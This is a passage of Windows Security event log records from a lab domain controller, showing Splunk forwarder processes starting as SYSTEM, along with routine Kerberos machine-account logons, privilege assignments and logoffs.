New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:21:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264569
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:21:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264571
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xba4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:21:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264573
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x832B94
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62777
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:21:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264572
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x832B94
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264575
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x833212
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {52856D24-E7E4-800D-C1D5-890AF5C2B413}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264574
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x833212
Privileges: SeAuditPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
04/19/2021 03:21:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264576
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x832B94
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:21:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264579
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x833EC1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:21:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264578
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x833EC1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53467
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:21:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264577
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x833EC1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:22:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264580
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1990
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264582
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x130c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264581
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf48
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264583
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x41c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264585
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1338
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264584
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1130
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264586
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x149c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264592
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x836E50
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264591
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x836E50
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53476
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264590
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x836E50
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264589
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x836DE4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264588
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x836DE4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53475
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264587
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x836DE4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:22:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264595
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x837B39
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:22:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264594
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x837B39
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
